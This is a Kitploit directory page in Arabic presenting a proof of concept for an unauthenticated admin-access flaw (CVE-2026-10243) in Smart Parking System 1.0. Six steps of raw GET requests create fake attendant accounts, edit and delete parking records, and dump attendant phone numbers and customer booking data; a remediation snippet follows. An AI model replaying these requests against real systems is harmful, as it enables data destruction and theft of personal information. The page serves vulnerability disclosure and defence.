Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10243-AUTH — إثبات مفهوم يوضح الوصول غير المصادق عليه إلى وظائف إدارية حرجة في نظام مواقف السيارات الذكي 1.0، مما يسمح بإنشاء حسابات، والتلاعب بالبيانات، وكشف المعلومات الشخصية القابلة للتعريف (PII). | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-10243-auth
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

إثبات مفهوم يوضح الوصول غير المصادق عليه إلى وظائف إدارية حرجة في نظام مواقف السيارات الذكي 1.0، مما يسمح بإنشاء حسابات، والتلاعب بالبيانات، وكشف المعلومات الشخصية القابلة للتعريف (PII).

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام مواقف السيارات الذكي 1.0 - وصول غير مصادق عليه إلى وظائف الإدارة الحرجة

معلومات الثغرة الأمنية

الحقلالتفاصيل
المنتجSmart Parking System
البائعcode-projects.org
الإصدار1.0
فئة الثغرة الأمنيةMissing Authentication for Critical Function (CWE-306)
معرف CVEقيد الانتظار
درجة CVSS9.8 حرجة (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
المصادقة المطلوبةلا شيء
الملفات المتأثرةattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

الوصف

يفشل نظام مواقف السيارات الذكي 1.0 من code-projects.org في فرض المصادقة على نقاط نهاية متعددة مخصصة للمشرف فقط. يمكن لمهاجم عن بُعد غير مصادق عليه الوصول مباشرة إلى هذه النقاط دون أي ملف تعريف ارتباط للجلسة وتنفيذ عمليات مميزة بما في ذلك إنشاء حسابات مرافقين، وتحرير وحذف سجلات مواقف السيارات، وعرض جميع بيانات العملاء الشخصية وبيانات الحجوزات.

لا تتطلب استغلال هذه الثغرة الأمنية أي بيانات اعتماد، أو رمز جلسة، أو أي تفاعل من أي مستخدم شرعي.


نظرة عامة على سلسلة الهجوم

root@kitploit:~
لا بيانات اعتماد / لا جلسة
        ↓
طلب GET مباشر إلى نقاط نهاية المشرف
        ↓
attendant.php     ← إنشاء حسابات مرافقين مزيفة
edit.php          ← قراءة واستبدال أي سجل مواقف سيارات
basic_table.php   ← حذف أي سجل مواقف سيارات
basic_table2.php  ← تفريغ جميع البيانات الشخصية للمرافقين
admin_request.php ← تفريغ جميع رسائل البريد الإلكتروني للعملاء وبيانات الحجوزات
        ↓
اختراق كامل لوظائف الإدارة

إثبات المفهوم خطوة بخطوة

الخطوة 1 — تأكيد الحالة غير المصادق عليها

افتح جلسة متصفح جديدة بدون ملفات تعريف ارتباط. انتقل إلى جذر التطبيق. تظهر صفحة تسجيل الدخول مما يؤكد عدم وجود جلسة نشطة:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

الخطوة 2 — الوصول إلى لوحة إنشاء المرافقين (بدون مصادقة)

انتقل مباشرة إلى نقطة نهاية تسجيل المرافقين:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

النتيجة: يتم تحميل نموذج "إضافة تفاصيل مرافق مواقف السيارات" الكامل مع حقول للاسم الأول واسم العائلة ورقم الجوال والشارع واسم المستخدم وكلمة المرور. يمكن للمهاجم تسجيل حساب مرافق مزيف مع وصول إلى النظام.


الخطوة 3 — قراءة وتعديل سجلات مواقف السيارات (بدون مصادقة)

انتقل مباشرة إلى نقطة نهاية تحرير سجل مواقف السيارات:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

النتيجة: يتم تحميل نموذج "تحديث تفاصيل مواقف السيارات" معبأ مسبقًا بقيم قاعدة البيانات الحية:

root@kitploit:~
المدينة:   مومباسا
الشارع:    تيودور
المواقف:   150
التكلفة:   500

يمكن للمهاجم استبدال أي حقل وتقديمه لحفظ التغييرات مباشرة في قاعدة البيانات.


الخطوة 4 — حذف سجل مواقف السيارات (بدون مصادقة)

أرسل طلب GET مباشر إلى نقطة نهاية الحذف:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

النتيجة: يستجيب التطبيق بما يلي:

root@kitploit:~
تم حذف موقف السيارات بنجاح

يتم تدمير السجل نهائيًا في قاعدة البيانات. لا حاجة لمصادقة، ولا رمز CSRF، ولا مطالبة تأكيد.


الخطوة 5 — تفريغ جميع المرافقين (بدون مصادقة)

انتقل مباشرة إلى نقطة نهاية قائمة المرافقين:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

النتيجة: يتم إرجاع القائمة الكاملة للمرافقين بما في ذلك الأسماء وأرقام الجوال والطرق المخصصة:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

الخطوة 6 — تفريغ جميع بيانات حجوزات العملاء (بدون مصادقة)

انتقل مباشرة إلى نقطة نهاية طلبات الحجز الإدارية:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

النتيجة: يتم إرجاع جميع سجلات حجوزات العملاء بما في ذلك رسائل البريد الإلكتروني والمواقف والساعات والتكاليف:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

التأثير

  • وصول كامل للوحة الإدارة — جميع الوظائف المميزة قابلة للوصول بدون أي بيانات اعتماد
  • تدمير البيانات — يمكن حذف أي سجل مواقف سيارات بشكل دائم
  • التلاعب بالبيانات — يمكن تعديل أي سجل مواقف سيارات
  • تصعيد الامتيازات — يمكن إنشاء حسابات مرافقين مزيفة مع تسجيل دخول إلى النظام
  • كشف البيانات الشخصية — يتم جمع جميع رسائل البريد الإلكتروني للعملاء وسجل الحجوزات
  • تسريب بيانات المرافقين — يتم كشف القائمة الكاملة بما في ذلك الأسماء وأرقام الهواتف

ملخص الملفات المتأثرة

الملفالثغرة الأمنية
attendant.phpإنشاء حسابات مرافقين بدون مصادقة
edit.phpوصول قراءة/كتابة بدون مصادقة إلى سجلات مواقف السيارات
basic_table.phpحذف سجلات مواقف السيارات بدون مصادقة
basic_table2.phpوصول بدون مصادقة إلى البيانات الشخصية الكاملة للمرافقين
admin_request.phpوصول بدون مصادقة إلى جميع بيانات حجوزات العملاء

المعالجة

أضف فحص مصادقة الجلسة في أعلى كل ملف PHP موجه للمشرف:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

المراجع

  • الصفحة الرئيسية للبائع
  • CWE-306: Missing Authentication for Critical Function
  • OWASP: Broken Access Control

المكتشف

  • الباحث: Imad Alvi
تنزيل الأداة